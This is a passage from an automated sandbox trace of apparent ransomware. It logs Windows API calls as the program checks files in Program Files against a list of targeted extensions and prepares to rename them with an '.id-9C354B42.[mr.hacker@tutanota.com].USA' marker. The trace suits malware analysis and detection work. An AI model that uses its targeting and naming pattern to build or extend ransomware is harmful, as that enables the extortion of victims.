(lpString1=".xlsx", lpString2="d.xml") returned -1 [0264.381] lstrlenW (lpString=".ppt") returned 4 [0264.381] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.381] lstrlenW (lpString=".zip") returned 4 [0264.381] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.381] lstrlenW (lpString=".rar") returned 4 [0264.381] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.381] lstrlenW (lpString=".bz2") returned 4 [0264.381] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.381] lstrlenW (lpString=".7z") returned 3 [0264.381] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.381] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.382] lstrlenW (lpString=".dbf") returned 4 [0264.382] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.382] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.382] lstrlenW (lpString=".1cd") returned 4 [0264.382] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.382] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0264.382] lstrlenW (lpString=".jpg") returned 4 [0264.382] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.382] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0264.382] lstrlenW (lpString="ea.xml") returned 6 [0264.382] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0264.790] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=384) returned 1 [0264.790] CloseHandle (hObject=0x380) returned 1 [0264.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0264.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.791] lstrlenW (lpString=".doc") returned 4 [0264.791] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.791] lstrlenW (lpString=".docx") returned 5 [0264.791] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0264.791] lstrlenW (lpString=".pdf") returned 4 [0264.791] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.791] lstrlenW (lpString=".xls") returned 4 [0264.791] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.791] lstrlenW (lpString=".xlsx") returned 5 [0264.791] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0264.791] lstrlenW (lpString=".ppt") returned 4 [0264.791] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.791] lstrlenW (lpString=".zip") returned 4 [0264.791] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.791] lstrlenW (lpString=".rar") returned 4 [0264.791] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.791] lstrlenW (lpString=".bz2") returned 4 [0264.791] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.791] lstrlenW (lpString=".7z") returned 3 [0264.791] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.791] lstrlenW (lpString=".dbf") returned 4 [0264.791] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.791] lstrlenW (lpString=".1cd") returned 4 [0264.791] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.792] lstrlenW (lpString=".jpg") returned 4 [0264.792] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.792] lstrlenW (lpString=".doc") returned 4 [0264.792] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0264.792] lstrlenW (lpString=".docx") returned 5 [0264.792] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0264.792] lstrlenW (lpString=".pdf") returned 4 [0264.792] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0264.792] lstrlenW (lpString=".xls") returned 4 [0264.792] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0264.792] lstrlenW (lpString=".xlsx") returned 5 [0264.792] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0264.792] lstrlenW (lpString=".ppt") returned 4 [0264.792] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0264.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.792] lstrlenW (lpString=".zip") returned 4 [0264.792] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0264.792] lstrlenW (lpString=".rar") returned 4 [0264.792] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0264.792] lstrlenW (lpString=".bz2") returned 4 [0264.792] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0264.792] lstrlenW (lpString=".7z") returned 3 [0264.792] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0264.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.792] lstrlenW (lpString=".dbf") returned 4 [0264.793] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0264.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.793] lstrlenW (lpString=".1cd") returned 4 [0264.793] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0264.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0264.793] lstrlenW (lpString=".jpg") returned 4 [0264.793] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0264.793] Sleep (dwMilliseconds=0x64) [0265.119] lstrcmpiW (lpString1=".bmp", lpString2=".USA") returned -1 [0265.119] lstrlenW (lpString="verisign.bmp") returned 12 [0265.119] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0265.152] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=2702) returned 1 [0265.152] CloseHandle (hObject=0x328) returned 1 [0265.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 0x20 [0265.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.153] lstrlenW (lpString=".doc") returned 4 [0265.153] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0265.153] lstrlenW (lpString=".docx") returned 5 [0265.153] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0265.153] lstrlenW (lpString=".pdf") returned 4 [0265.153] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0265.153] lstrlenW (lpString=".xls") returned 4 [0265.153] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0265.153] lstrlenW (lpString=".xlsx") returned 5 [0265.153] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0265.153] lstrlenW (lpString=".ppt") returned 4 [0265.154] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0265.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.154] lstrlenW (lpString=".zip") returned 4 [0265.154] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0265.154] lstrlenW (lpString=".rar") returned 4 [0265.154] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0265.154] lstrlenW (lpString=".bz2") returned 4 [0265.154] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0265.154] lstrlenW (lpString=".7z") returned 3 [0265.154] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0265.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.154] lstrlenW (lpString=".dbf") returned 4 [0265.154] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0265.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.154] lstrlenW (lpString=".1cd") returned 4 [0265.154] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0265.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.154] lstrlenW (lpString=".jpg") returned 4 [0265.154] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0265.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.154] lstrlenW (lpString=".doc") returned 4 [0265.154] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0265.154] lstrlenW (lpString=".docx") returned 5 [0265.154] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0265.154] lstrlenW (lpString=".pdf") returned 4 [0265.154] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0265.155] lstrlenW (lpString=".xls") returned 4 [0265.155] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0265.155] lstrlenW (lpString=".xlsx") returned 5 [0265.155] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0265.155] lstrlenW (lpString=".ppt") returned 4 [0265.155] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0265.155] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.155] lstrlenW (lpString=".zip") returned 4 [0265.155] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0265.155] lstrlenW (lpString=".rar") returned 4 [0265.155] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0265.155] lstrlenW (lpString=".bz2") returned 4 [0265.155] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0265.155] lstrlenW (lpString=".7z") returned 3 [0265.155] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0265.155] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.155] lstrlenW (lpString=".dbf") returned 4 [0265.155] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0265.155] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.155] lstrlenW (lpString=".1cd") returned 4 [0265.155] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0265.155] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0265.155] lstrlenW (lpString=".jpg") returned 4 [0265.155] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0265.155] Sleep (dwMilliseconds=0x64) [0265.541] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.541] lstrlenW (lpString="btn-previous-static.png") returned 23 [0265.541] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.567] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=3595) returned 1 [0265.567] CloseHandle (hObject=0x2a8) returned 1 [0265.567] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png")) returned 0x20 [0265.595] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.610] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.610] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.610] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.610] lstrlenW (lpString=".doc") returned 4 [0265.610] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.610] lstrlenW (lpString=".docx") returned 5 [0265.610] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0265.610] lstrlenW (lpString=".pdf") returned 4 [0265.610] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.610] lstrlenW (lpString=".xls") returned 4 [0265.611] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.611] lstrlenW (lpString=".xlsx") returned 5 [0265.611] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0265.611] lstrlenW (lpString=".ppt") returned 4 [0265.611] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.611] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.611] lstrlenW (lpString=".zip") returned 4 [0265.611] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.611] lstrlenW (lpString=".rar") returned 4 [0265.611] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.611] lstrlenW (lpString=".bz2") returned 4 [0265.611] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.611] lstrlenW (lpString=".7z") returned 3 [0265.611] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.611] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.611] lstrlenW (lpString=".dbf") returned 4 [0265.611] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.611] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.611] lstrlenW (lpString=".1cd") returned 4 [0265.611] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.611] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.611] lstrlenW (lpString=".jpg") returned 4 [0265.614] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.614] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.614] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.614] lstrlenW (lpString=".doc") returned 4 [0265.614] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.614] lstrlenW (lpString=".docx") returned 5 [0265.614] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0265.614] lstrlenW (lpString=".pdf") returned 4 [0265.614] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.614] lstrlenW (lpString=".xls") returned 4 [0265.614] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.614] lstrlenW (lpString=".xlsx") returned 5 [0265.615] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0265.615] lstrlenW (lpString=".ppt") returned 4 [0265.615] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.615] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.615] lstrlenW (lpString=".zip") returned 4 [0265.615] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.615] lstrlenW (lpString=".rar") returned 4 [0265.615] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.615] lstrlenW (lpString=".bz2") returned 4 [0265.615] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.615] lstrlenW (lpString=".7z") returned 3 [0265.615] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.615] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.615] lstrlenW (lpString=".dbf") returned 4 [0265.615] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.615] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.615] lstrlenW (lpString=".1cd") returned 4 [0265.615] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.615] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png") returned 76 [0265.615] lstrlenW (lpString=".jpg") returned 4 [0265.615] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.615] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.615] lstrlenW (lpString="play-static.png") returned 15 [0265.615] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.616] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=1285) returned 1 [0265.616] CloseHandle (hObject=0x2a8) returned 1 [0265.616] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png")) returned 0x20 [0265.616] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.616] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.616] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.616] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.616] lstrlenW (lpString=".doc") returned 4 [0265.616] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.616] lstrlenW (lpString=".docx") returned 5 [0265.616] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0265.616] lstrlenW (lpString=".pdf") returned 4 [0265.616] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.616] lstrlenW (lpString=".xls") returned 4 [0265.616] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.616] lstrlenW (lpString=".xlsx") returned 5 [0265.616] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0265.616] lstrlenW (lpString=".ppt") returned 4 [0265.616] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.616] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.617] lstrlenW (lpString=".zip") returned 4 [0265.617] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.617] lstrlenW (lpString=".rar") returned 4 [0265.617] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.617] lstrlenW (lpString=".bz2") returned 4 [0265.617] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.617] lstrlenW (lpString=".7z") returned 3 [0265.617] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.617] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.617] lstrlenW (lpString=".dbf") returned 4 [0265.617] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.617] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.617] lstrlenW (lpString=".1cd") returned 4 [0265.617] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.617] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.617] lstrlenW (lpString=".jpg") returned 4 [0265.617] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.617] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.617] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.617] lstrlenW (lpString=".doc") returned 4 [0265.617] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.617] lstrlenW (lpString=".docx") returned 5 [0265.617] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0265.617] lstrlenW (lpString=".pdf") returned 4 [0265.617] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.617] lstrlenW (lpString=".xls") returned 4 [0265.617] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.617] lstrlenW (lpString=".xlsx") returned 5 [0265.617] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0265.617] lstrlenW (lpString=".ppt") returned 4 [0265.618] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.618] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.618] lstrlenW (lpString=".zip") returned 4 [0265.618] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.618] lstrlenW (lpString=".rar") returned 4 [0265.618] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.618] lstrlenW (lpString=".bz2") returned 4 [0265.618] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.618] lstrlenW (lpString=".7z") returned 3 [0265.618] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.618] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.618] lstrlenW (lpString=".dbf") returned 4 [0265.618] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.618] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.618] lstrlenW (lpString=".1cd") returned 4 [0265.618] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.618] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 68 [0265.618] lstrlenW (lpString=".jpg") returned 4 [0265.618] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.618] lstrcmpiW (lpString1=".bmp", lpString2=".USA") returned -1 [0265.618] lstrlenW (lpString="BlackRectangle.bmp") returned 18 [0265.618] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.619] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=4726) returned 1 [0265.619] CloseHandle (hObject=0x2a8) returned 1 [0265.619] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp")) returned 0x20 [0265.619] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.619] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 